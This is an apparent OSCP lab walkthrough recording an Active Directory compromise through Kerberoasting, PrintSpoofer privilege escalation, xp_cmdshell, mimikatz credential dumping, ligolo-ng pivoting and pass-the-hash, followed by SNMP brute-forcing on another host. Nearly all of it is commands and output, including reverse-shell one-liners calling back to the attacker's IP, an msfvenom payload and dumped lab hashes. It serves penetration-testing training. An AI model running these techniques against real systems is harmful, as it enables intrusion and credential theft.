Information
About this lab
This lab challenges learners to exploit exposed services and misconfigurations in an Active Directory environment. Starting with a Kerberoasting attack to crack service account credentials, learners perform lateral movement, configure SQL Server for command execution, and escalate privileges to NT AUTHORITY\SYSTEM using the SeImpersonatePrivilege. The exercise culminates in a domain compromise through hash extraction and reuse.
Active Directory Set
192.168.162.147 - MS01
Eric.Wallows / EricLikesRunning800
Nmap
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
5040/tcp open unknown
5985/tcp open wsman
8000/tcp open http-alt
8080/tcp open http-proxy
8443/tcp open https-alt
47001/tcp open winrmInitial Access
Connected to 192.168.162.147 via winrm using provided credentials
┌──(kali🎃kali)-[~]
└─$ evil-winrm -i 192.168.162.147 -u 'Eric.Wallows' -p 'EricLikesRunning800'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\eric.wallows\Documents>Privilege Escalation
Found SeImpersonatePrivilege enabled on the user
PS C:\Users> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= =======
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone EnabledFound that the spoolsv service is running
PS C:\Users> ps | findstr spoolsv
436 20 5140 14980 2132 0 spoolsvUploaded PrintSpoofer64.exe, nc64.exe files
*Evil-WinRM* PS C:\Users\eric.wallows\Desktop> upload ~/Tools/PrintSpoofer64.exe
Info: Uploading /home/kali/Tools/PrintSpoofer64.exe to C:\Users\eric.wallows\Desktop\PrintSpoofer64.exe
Data: 36180 bytes of 36180 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\eric.wallows\Desktop> upload ~/Tools/nc64.exe
Info: Uploading /home/kali/Tools/nc64.exe to C:\Users\eric.wallows\Desktop\nc64.exe
Data: 60360 bytes of 60360 bytes copied
Info: Upload successful!Executed PrintSpoofer
*Evil-WinRM* PS C:\Users\eric.wallows\Desktop> .\PrintSpoofer64.exe -c "nc64.exe 192.168.45.187 9999 -e powershell"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OKSuccessfully established a reverse shell connection with SYSTEM privileges
┌──(kali🎃kali)-[~/Tools]
└─$ rlwrap nc -nlvp 9999
listening on [any] 9999 ...
connect to [192.168.45.187] from (UNKNOWN) [192.168.162.147] 62788
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Windows\system32> whoami
whoami
nt authority\systemPost-Exploitation
Added Eric.Wallows to the Administrators local group
PS C:\Users> net localgroup Administrators Eric.Wallows /add
net localgroup Administrators Eric.Wallows /add
The command completed successfully.Enumerated local user accounts
PS C:\Users\eric.wallows\Documents> net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator DefaultAccount Guest
Mary.Williams support WDAGUtilityAccount
The command completed with one or more errors.Enumerated domain user accounts
PS C:\Users> net user /domain
The request will be processed at a domain controller for domain oscp.exam.
User accounts for \\DC01.oscp.exam
-------------------------------------------------------------------------------
Administrator Aimee.Hunt Carol.Webb
celia.almeda Chelsea.Byrne Donna.Johnson
Emily.Bishop eric.wallows Frank.Farrell
Georgina.Begum Guest Jamie.Thomas
Jane.Booth Janice.Turner Joan.North
john.dorian Kenneth.Coles krbtgt
Lawrence.Kay Leonard.Morris Linda.Patel
Luke.Martin Oliver.Gray Sandra.Craig
Shane.Mitchell sql_svc Thomas.Robinson
tom.kinney tom_admin web_svc
The command completed successfully.Used NetExec with lsassy module to dump credentials from memory and obtained NTLM hashes for web_svc and Administrator
┌──(kali🎃kali)-[~/oscp/ad_set/147]
└─$ nxc smb 192.168.162.147 -u 'Eric.Wallows' -p 'EricLikesRunning800' -M lsassy
SMB 192.168.162.147 445 MS01 [*] Windows 10 / Server 2019 Build 19041 x64 (name:MS01) (domain:oscp.exam) (signing:False) (SMBv1:False)
SMB 192.168.162.147 445 MS01 [+] oscp.exam\Eric.Wallows:EricLikesRunning800 (Pwn3d!)
LSASSY 192.168.162.147 445 MS01 OSCP\web_svc 53e938166782a44e241beaf02d081ff6
LSASSY 192.168.162.147 445 MS01 MS01\Administrator 3c4495bbd678fac8c9d218be4f2bbc7bDumped local SAM hashes using secretsdump
┌──(kali🎃kali)-[~/oscp/ad_set/147]
└─$ impacket-secretsdump oscp.exam/Eric.Wallows:"EricLikesRunning800"@192.168.162.147
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xa5403534b0978445a2df2d30d19a7980
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3c4495bbd678fac8c9d218be4f2bbc7b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:11ba4cb6993d434d8dbba9ba45fd9011:::
Mary.Williams:1002:aad3b435b51404eeaad3b435b51404ee:9a3121977ee93af56ebd0ef4f527a35e:::
support:1003:aad3b435b51404eeaad3b435b51404ee:d9358122015c5b159574a88b3c0d2071:::Cracked NTLM hashes and obtained plaintext passwords:
- Diamond1
- Freedom1
- December31
┌──(kali🎃kali)-[~/oscp/ad_set]
└─$ hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt --quiet
/home/kali/.local/share/hashcat/hashcat.dictstat2: Outdated header version, ignoring content
53e938166782a44e241beaf02d081ff6:Diamond1
d9358122015c5b159574a88b3c0d2071:Freedom1
3c4495bbd678fac8c9d218be4f2bbc7b:December31Pivoting
Executed ligolo-ng proxy on my Kali Linux machine
┌──(kali🎃kali)-[~/oscp/ad_set]
└─$ sudo ligolo-proxy -selfcert
INFO[0000] Loading configuration file ligolo-ng.yaml
WARN[0000] Using default selfcert domain 'ligolo', beware of CTI, SOC and IoC!
INFO[0000] Listening on 0.0.0.0:11601
__ _ __
/ / (_)___ _____ / /___ ____ ____ _
/ / / / __ `/ __ \/ / __ \______/ __ \/ __ `/
/ /___/ / /_/ / /_/ / / /_/ /_____/ / / / /_/ /
/_____/_/\__, /\____/_/\____/ /_/ /_/\__, /
/____/ /____/
Made in France ♥ by @Nicocha30!
Version: dev
ligolo-ng » INFO[0020] Agent joined. id=005056ab9772 name="OSCP\\eric.wallows@MS01" remote="192.168.162.147:62830"
ligolo-ng »
ligolo-ng » session
? Specify a session : 1 - OSCP\eric.wallows@MS01 - 192.168.162.147:62830 - 005056ab9772
[Agent : OSCP\eric.wallows@MS01] » interface_create --name ligolo
INFO[0031] Creating a new ligolo interface...
INFO[0031] Interface created!
[Agent : OSCP\eric.wallows@MS01] » start
INFO[0036] Starting tunnel to OSCP\eric.wallows@MS01 (005056ab9772)
[Agent : OSCP\eric.wallows@MS01] » route_add --name ligolo --route 10.10.119.0/24
INFO[0054] Route created.Executed ligolo-ng agent on the target machine and connected back to my kali linux for pivoting
*Evil-WinRM* PS C:\Users\eric.wallows\Desktop> .\agent -connect 192.168.45.187:11601 -ignore-cert10.10.119.148 - MS02
Nmap
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1433/tcp open ms-sql-s
5985/tcp open wsmanLateral Movement (MS01 to MS02)
Performed Kerberoasting attack using impacket-GetUserSPNs and obtained TGS hashes for sql_svc and web_svc
┌──(kali🎃kali)-[~/oscp/ad_set]
└─$ impacket-GetUserSPNs -request -dc-ip 10.10.119.146 oscp.exam/eric.wallows
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------- -------- -------------------------- -------------------------- ----------
MSSQL/MS02.oscp.exam sql_svc 2022-11-10 03:03:18.456165 2022-11-10 06:15:51.783016
HTTP/MS01.oscp.exam web_svc 2022-11-11 02:11:19.795439 2025-12-17 10:27:17.019965
[-] CCache file is not found. Skipping...
$krb5tgs$23$*sql_svc$OSCP.EXAM$oscp.exam/sql_svc*$a1fa9f19714aa1551e4e9a3449f4d5eb$ca36c3e15f96e065e0f5529f5c9eaefe64c1ac8287a98e23886709f05a1b280856591dc6944bf1fee29b4dd06490661b40f5564486557591052cf28c22b85f36aedd86ba06961688a888b8f64c2ece87a7a47e6378375c5989c65f93369d6f1a3069ac64b36a71347cd1ece33fd7fdb4aba8dc18678b9629306e7ad5fe6b99536559e9b1cb453bc5f83479ce4ec945966c88f58bd5ef817929db12d3d3d994c2a0a83c47aaf26fec9ed6360d54b37eaf619ad28596ae2416a9804c86eb034461c137a8280db46ff22dc3fb31272bf30141bc8909190b177503e06df3625ce5dfefa8cb3b3a8251f0f323f2f4ae99d9a610f95e5ba2aa9f2289491b09cdd628d7b0fcdf59b7156bf305d74e4d1cbeb09923ab495958ea0bff781e126008459a83a0ac6bffa075da5e51927e68bc5761c6a5d4edeba80c53a7f162e1c4bb7b87e34e465f9aae29f1122fe72bf668764253bdee2d0691c1a07051829507718ca292c04cb9069b35059433401ac92018f7b5dc374232b54a17d59ea41872d5cf8a73a6d437350c80dad9cc1442e11e256e28cb31a550e8a2fddac396ed3eabb152dd7032e25f215f6dfbf5a1f892bc2054d0a7ca86b08585edfd405c948b7fb16830ed8ec88894d18cd55c7eb4e3e2db317880735317051d166229677d0445a676285ae242f1c5014c9b2b9f7a60e50ed6ead44b4bae3aba948c8f94bc53d215a388bafef8a47fbb85a917e6bb1609ecae1f24957fa6fe264fa13759b24d92805f7ae8062ac1abdf9c48515b0fcce770f78d40d95be268cc1e552b1d5ac82ae5dbae0826cfaa152964780adac7b002121c227df511dd7789256e489dcf1bc62ac1d995ef0c3ea55b6a4768f17b02de1e9996b47a5e2d779c54d98cc247059c6c795ce782ea66818075ce8f76e84dcfdbcd068faa3b1ab9a2c5047b566b32972f6df06e9a5fca8bcd8385bf45f09eeb86ee225cd0b87b3930029a4aedcf145a0bf2bbc0b052453a27a6d344a910090cdc4b18b0d84d4bb1737e365c519320d4fcb25fc04eae796fd91ba08890f7f4466986a7a1120c72cd9283d6529bdfa13c7ba437e674dba9172224306c810f1d7a358558f3648abffe525fdb81394d989626e550c9fb91e9e095a7a7bbdf97301f2a9ff09c232da8be080a7b788b41777e01585127c4b38b63bbae57e0f812f8378aca76b2af6d2172d19b7274015c6dbb198f97a8ed3782f27c3ca630dd2463e9eba9f83aae69b40b35460c9f847dc9877e0e542191f89d83669c76100c15b799063ad8008b73745ab6c19c068169351b6a6a08c17f80fd183444f7ae7ede505425d1c995a328166719f92b8fcc48a7e1069d6bf6dccb2b6459390190a51323dbe1b51593ba9d837a942ec3e12d6f63f2a0990cc3bb1e09843b436f3d72f1cfdaff66565e1e342a090dbe680134ab6a2c791a0954fa04accc09ddc737258d4a289d794d2f5b8ee92034
$krb5tgs$23$*web_svc$OSCP.EXAM$oscp.exam/web_svc*$18e8198187e2eb2f981cce0d2cb8ad43$96793b7afe33440af5ad1ea3434ea743ba7162c25ff1873984446b538141cb0552edce58ea0ecc7dc32090195cf121c470e7fbd5bc1a24d5a1a8228756f0f2fcc83a8581e6978c945603588f1e23fb3d754bbd677b2bd262ed978d3f937a03cf10a13022d70d509b8416b124eca3e99985d92d278a10969397a74e89fdf79cd46ee94fd058b0ae0da62505dfb9367ecd683886e9fb85bca0793930b161d79e777f0a0a56b82a6bab3465120b08e1735c2a4c44b3b5b1acc8e8cc3d6bc2e474b8a621f0041b5a80eca431b0643e13e66bae87929149a6bf8a04c023a5b8f497ca7bdeaf62370210806ed63aca93bd4cdf4a76279983f0911a3dd19802375e2c2b48766603241f03fa6d3be3e7e323499be063fd5a2b7061b34424aaca6bca97b451ba6ea1522b67a092ba17446d6f5630537d58fde5cfd971a38928dd8bcdb1813d0bff07bd2bcadbc4548f780dbf21ba119efc435fbc4db798a34eb72a2f663e5c34211a43d2f4b0b1b783836b3d9504adfb6a4a5e8028e7717510ef10c612261ec3e142b95f9cbb1bd42d9ebcc9ad78dbb5116183d41f2700f46d71f063e6c603ed4520b89a623f34bd5f20d825249b9eeea715a670ad15044d17ec6aceb4693d24d244bfacd80a03458560cc8fd6ce33357676e09d771d3307cd98d7e79171c536d3327dd09f8e0d2dbbcda4c82976c44dc2f2fa11cf4e514bfcaa80c6cfaa2762b7bbe0cfdb627f890f041e6702f54a2b99b15f169e578df0435ca4bbc0939060feb7bc1d65a87e749bd79f8421ca0b4c052a1e9c1cf079778e47441cfd5337b616b54467bd431d01f063d7bd472eb50bbe2eda4e8f6c2c4d7342584ad0e097b5518a6456ff376797246ebfc6d7838b67486613b7468df1254c20b0fafe89f188cf0405dbe7c54a192e5673bb2ac319ba0f9f072248060b4ec83cdf26319cc354167579cbcae437e181f1bd733c3bc179e2fe6cd5d19d0f20f05272e6cf1f1f011d79e8a4aea205296c2df9fb6eee9c0c067e5ea0c4470c3a38f40ef62430147937a82dd27853b148b1dcb20037094bdf4dd718a8b95d57b820ca648d75ae8f6004a1d27551bd2283988e559642aed2ea048e1a42edce71121f3680461a6537071c2ac9908c8eebaa00a5ea8ac73b6a51d6a61143202b3f1b33bf423e9f9f955b9282f01d8cbba2151fadf791c1373c6f179985c8fe3949640ebf574cc3d4d462f29a8af64729fdaa0b513236b7a3b6fb8af563248dd81de41bf6ab5d9abaa6d32930536f73278946f0249a7a18bc4c6646476b7114f6064c4131db50270875d042427ae770cd7f88fbb90318875f602c4a85645285d8e4c7aabff3151c82523d8dc304c103a03d3a8b3f8cdfa6d81848b7bc3ba6995983a5e3dd73a8555ef9e81d7ecf486a0ca55d3c6820fd1b246f1d1589a1fe8743910bc1c0d656adda664da599cdf9adb03432ec24296c498f79bc187a12c3Crakced the TGS hashes and recovered plaintext passwords:
- web_svc: Diamond1
- sql_svc: Dolphin1
┌──(kali🎃kali)-[~/oscp/ad_set]
└─$ hashcat -m 13100 spn_hash.hash /usr/share/wordlists/rockyou.txt --quiet
$krb5tgs$23$*web_svc$OSCP.EXAM$oscp.exam/web_svc*$e711dcc8304bcc618bf8b849ee0797b1$24b5400bae7a79fccaf8472f4afd6ae0afc119a8d9bb74101b6435ab6f07dbc0f347343558ee85e6ec2bc2b63d40fa85bbf2d3bc6837612303083fdfb9c00f650f3a34fa80fde364369e7cc543bad597c4377a3f0b320bbd36a9cf37595e8fa3fcb585d95d57f0e44a3c7cdd0c8653216a7dfecc21fc5a2e25a482e343edd9e84023937ba7982291c61e9bbc7745c01a16bdb8c9c68eca6b5d22c6a3c8879baa8caaeea07f2bba5ac3e68ec58d10afc4f525f623d0b063ef4f5214d29afb2cf82daa9cba8250172386c9b32ca9f21f380b6154608a8ee7b563634bfcc9c937982b72174f565fd7dab981441bd7e1196141a390c8d842ada7b2f3668fcd89d7fc8277b77278be8813613789f4328530c2191ff170ca44ff7fb4b6ab7dbfd0f8bef5be078bd6e6e0bb9e2ce57be3a177e9dce3f3cb6fe7d88f1033ef66c0f0eec3c039a1dd74311ac39356b2173cd27b8e9b3d0dd13768c84ee2ed503caf3be724ea09c3dc236108221768b68ebcf2704b0f02a1e5f320c3aca8821df464b44d983feb026649f24b5df3506462eca681f461488a5aad5baf0069bb0fc1c9a04debac06c2e21bdb43bc69bf777f26819e36e5fafe51e6d95d99e4b5eaee2d4d307141f6ca9f021bef63dcc586abdff8c352f35b72e096d37fe7f4d698c0d203008d4bb3d1111ddf651415571def504ac2812ba08344aa77b65830908267dec5827ae88e82009ab2942f2cf5a3060ad647559239a1747286002f5445d12b626e1cf86274d023f2ee7de8154763b774fb8009d16aee7a9495c51300553aff987122160322e8e6628770b7ab60a3fac0c0bbc93231c96cafdedda510268395213ab0e1f61d9eeaf8fbfcbbf659d19a5d15c088bcb62b6f3c9c5dbff14c9dc5996287e621f9959576b6af365b250c48b21771c07745dcf627c349516403ba81d69858d1d5eda7479fbe492125c5285ab7cd93c4eda3240d07cc00ab959f86f702a3f77e11c1e6b31561172ba5baf0c4f930a92da4fadfbd961ce2819a51fda03acf8d4963366cc6a80e215dfb2edaf2d8c3ceaaebc00680d873d9eed3c12b6d54ae72e466727651a3ba0e6a0e737181ec4c6390db98505b1d263c73dda0980ad60ae4b51910761a89d45d6e049e05d81aefc31a0d66cf5071c40297085dfab4580608f06791234dcd47dd60a206ede84537c97a59130dc6998a9ef72f096d223adbcd428a3a54899083e4dd6b79ec5e3fda020c996d18e94f176dd9767f89d0118f214809a4c857230bb00c1b1d02ba7bf2adbf85994db158bceabd04c396920571f8a42fcdd898289e7f25387eac18f67a1cce3a8d08419fb5077241d7540c5ed0900ce3cc5b05e1eed0a8ce3e0894db2e3f6c6fc83c73e1d9930f1ca69639e60585766e9c25e142f353b7d5003b24d5eca48abdae41ec545dc158e817e762313161e2d4b3a20b2f8af22a0999e75f6d5b3385e288fb402e5e:Diamond1
$krb5tgs$23$*sql_svc$OSCP.EXAM$oscp.exam/sql_svc*$ac60853fd980060e9925327a82d754d8$b306acb7e61142e531515b90d0eb5628888e0c3785025a46728a5a2b210e784cbbacb6523843df06b9bf99bff7904100400effcbcede29e89fc4dd146f8978f2db5bc257cee5460d004d4f0c2ff183b0c455f34354a421439f726d337fb833dbe4ff2e2fc185fa7b10e63fdec4bb079b8024aa590c3d17c461198987b9aadc2aed3fa03a2d4fb59c46b25482fc8077afa890d1083b08d44755c78b690e8678acee665d4c4a78958f9052a7cbd1ef05a9c88c0b2de841e925c89b451cc157327c2804899b4d7885c5fb4bf4ba29220196e0c64b2224594974a53c532219ca7d9af90bac54a8a09d0058d15cbf022844a9833ed03566a087157bff44a7b1b8f57bc8881d2549c7c7638f1a104641a8f649aa44acb35950e54185ab2b22c74b556525ca959abad62ba48195a6d305473097d616d5418dbace87dbb06b3b368de5b2cc1374e176262e964054de9d83c097ffdfd2ce6be247d347b626b52df76fbdf9fb256ced945e4ffc32767620e82291615c321948c2a80f8b935780338c26b3c9386b128e34162738c6094e86c3ee1049eebe2fa69b3bd6b975d8f402ae66c075a3e2e2611b694f2d5dbdc1f88971e2de147dd304369f2897b50d8b30a8fecab29813fa7fa204a8b9628a3fa5b20ee1dabd8a5dc27beabca8f00ff8aca02195d875df400b1546687afec21150439afe90321396633be9eddabf66a19ed9c91ad6eb002dd3501cceb439a78afb00708145fad4e1ced6040a1db87960d7b6724a1e84fe1c95e57a5ab52a5a2abd092a82e3402ab63699e0b17732b670edb06b7c3ba5b1453216c9bf110e6e9931c6860d6b5692ac5340ff66e217f13096504a814772aa8e732e95bd4da1ebdfb1a6cea2beca3c5022ffbb760d7c2958ce47446ac117dd972f2fce3bbef6e557fc9e61d8ea6c6dca70bcac47d34d7163316b81083dcaf8e67059d744f9d18b11045cb2287efacb0dbcd11b6064b0adb205112d39f936fb1746fd823f73948c75e06a188ebbca20fe64359b8b4e7ee4e0ba7d651bbb7afe87d75c518f384e66227a05440a0d771e6054d577e8946969cffec4498a6d9d045a04e13fc567c6ccc08967be08f699f286859af100b111c9da424ef4c10532b0ccd21d0f88051537b8c7c391678194a69ba11ae157f7d21466fa8132cc89bd8d0de273f855adfb55f898b66a0453bbe5ae9d0dcb9a3fc304804a90820e2e01675222686b2557113690349c909f6aa4adbba124c20b875dc176e2863b5b0d49079ec66d921a7a0ecb484ebeb04d5fb2918f4c620c8cc9aaaecc1b0c2c7120c61d15c9d2b4e70a4f26c9b1bd82ab29379641adcf47ec2c7ed37c9145f61a38d95f1ae038b188c70cc68c7755aecea78e713f434fff9e87d5c6a6977883a86ea0ab3058b17c46bf609efad48b4c59cd098ea2e259b71685d9ad961b8ff361ea3ca11a225d8be6ba6bbf0d145aafe00798175314dc2b:Dolphin1Connected to MSSQL console using previously obtained sql_svc credentials
┌──(kali🎃kali)-[~/oscp/ad_set/148]
└─$ impacket-mssqlclient oscp.exam/sql_svc:Dolphin1@10.10.119.148 -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MS02\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MS02\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2019 RTM (15.0.2000)
[!] Press help for extra shell commands
SQL (OSCP\sql_svc dbo@master)>Privilege Escalation
Enabled command execution
SQL (OSCP\sql_svc dbo@master)> EXEC sp_configure 'show advanced options', 1; -- priv
INFO(MS02\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (OSCP\sql_svc dbo@master)> RECONFIGURE;
SQL (OSCP\sql_svc dbo@master)> EXEC sp_configure 'xp_cmdshell', 1;
INFO(MS02\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (OSCP\sql_svc dbo@master)> RECONFIGURE;
SQL (OSCP\sql_svc dbo@master)>SeImpersonatePrivilege 권한 있는거 확인 Confirmed that SeImpersonatePrivilege is enabled
SQL (OSCP\sql_svc dbo@master)> EXEC xp_cmdshell 'whoami /priv'
output
--------------------------------------------------------------------------------
NULL
PRIVILEGES INFORMATION
----------------------
NULL
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
NULLGenereated a reverse shell executable (payload.exe)
┌──(kali🎃kali)-[~/Tools]
└─$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.187 LPORT=8000 -f exe -o payload.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of exe file: 7680 bytes
Saved as: payload.exeConfigured port forwarding on ligolo-ng
ligolo-ng » listener_add --addr 0.0.0.0:9999 --to 127.0.0.1:9999Downloaded PrintSpoofer64.exe and nc64.exe
SQL (OSCP\sql_svc dbo@master)> EXEC xp_cmdshell 'powershell -c "curl.exe http://10.10.119.147:9999/PrintSpoofer64.exe -o C:\Users\Public\PrintSpoofer64.exe';
output
----------------------------------------------------------------------------------
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1245 100 1245 0 0 817k 0 --:--:-- --:--:-- --:--:-- 1215k
NULL
SQL (OSCP\sql_svc dbo@master)> EXEC xp_cmdshell 'powershell -c "curl.exe http://10.10.119.147:9999/nc64.exe -o C:\Users\Public\nc64.exe';
output
----------------------------------------------------------------------------------
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 7680 100 7680 0 0 17878 0 --:--:-- --:--:-- --:--:-- 17860
NULL Executed PrintSpoofer64.exe to exploit SeImpersonatePrivilege and establish elevated reverse shell connection
SQL (OSCP\sql_svc dbo@master)> exec xp_cmdshell 'C:\Users\Public\PrintSpoofer64.exe -c "nc64.exe 10.10.119.147 9999 -e powershell"';
output
-------------------------------------------
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
NULLSuccessfully received reverse shell connection
┌──(kali🎃kali)-[~/Tools]
└─$ rlwrap nc -nlvp 9999
listening on [any] 9999 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 49800
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
Try the new cross-platform PowerShell https://aka.ms/pscore6
PS C:\Windows\system32>Post-Exploitation
Executed mimikatz.exe and obtained Administrator NTLM hash:
- 59b280ba707d22e3ef0aa587fc29ffe5
PS C:\Users\Administrator\Desktop> .\mimikatz.exe
.\mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 401094 (00000000:00061ec6)
Session : Interactive from 1
User Name : Administrator
Domain : OSCP
Logon Server : DC01
Logon Time : 2/12/2025 1:41:25 PM
SID : S-1-5-21-2610934713-1581164095-2706428072-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : OSCP
* NTLM : 59b280ba707d22e3ef0aa587fc29ffe5
* SHA1 : f41a495e6d341c7416a42abd14b9aef6f1eb6b17
* DPAPI : 959ad2ea78c63aebf3233679ad90d769
tspkg :
wdigest :
* Username : Administrator
* Domain : OSCP
* Password : (null)
kerberos :
* Username : Administrator
* Domain : OSCP.EXAM
* Password : (null)
ssp :
credman :
cloudap :10.10.119.146 - DC01
Lateral Movement (MS02 to DC01)
Connected to DC01 using previously obtained Administrator NTLM hash via winrm
┌──(kali🎃kali)-[~/oscp/ad_set]
└─$ evil-winrm -i 10.10.119.146 -u 'Administrator' -H '59b280ba707d22e3ef0aa587fc29ffe5'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>Read proof.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/17/2025 11:26 PM 34 proof.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type proof.txt
3d02391b0b34ce1aea57965ad4babbe1Independent Challenges
192.168.162.149 - Kiero
Nmap
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
161/udp open snmpInitial Access
Found SNMP community string using hydra: public
┌──(kali🎃kali)-[~/oscp/149]
└─$ hydra -P /usr/share/wordlists/seclists/Discovery/SNMP/common-snmp-community-strings.txt snmp://192.168.162.149
Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-12-21 23:59:53
[DATA] max 16 tasks per 1 server, overall 16 tasks, 118 login tries (l:1/p:118), ~8 tries per task
[DATA] attacking snmp://192.168.162.149:161/
[161][snmp] host: 192.168.162.149 password: public
[STATUS] attack finished for 192.168.162.149 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-12-21 23:59:53Enumerated SNMP data using snmpwalk and found that kiero’s password was reset to default and identified user ‘john’
┌──(kali🎃kali)-[~/oscp/149]
└─$ snmpwalk -v2c -c public 192.168.162.149 NET-SNMP-EXTEND-MIB::nsExtendObjects
NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendCommand."RESET" = STRING: ./home/john/RESET_PASSWD
NET-SNMP-EXTEND-MIB::nsExtendArgs."RESET" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendInput."RESET" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."RESET" = INTEGER: 5
NET-SNMP-EXTEND-MIB::nsExtendExecType."RESET" = INTEGER: exec(1)
NET-SNMP-EXTEND-MIB::nsExtendRunType."RESET" = INTEGER: run-on-read(1)
NET-SNMP-EXTEND-MIB::nsExtendStorage."RESET" = INTEGER: permanent(4)
NET-SNMP-EXTEND-MIB::nsExtendStatus."RESET" = INTEGER: active(1)
NET-SNMP-EXTEND-MIB::nsExtendOutput1Line."RESET" = STRING: Resetting password of kiero to the default value
NET-SNMP-EXTEND-MIB::nsExtendOutputFull."RESET" = STRING: Resetting password of kiero to the default value
NET-SNMP-EXTEND-MIB::nsExtendOutNumLines."RESET" = INTEGER: 1
NET-SNMP-EXTEND-MIB::nsExtendResult."RESET" = INTEGER: 0
NET-SNMP-EXTEND-MIB::nsExtendOutLine."RESET".1 = STRING: Resetting password of kiero to the default valueSuccessfully logged into FTP service using kiero’s default credentials (kiero/kiero)
┌──(kali🎃kali)-[~/oscp/149]
└─$ ftp 192.168.162.149
Connected to 192.168.162.149.
220 (vsFTPd 3.0.3)
Name (192.168.162.149:kali): kiero
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
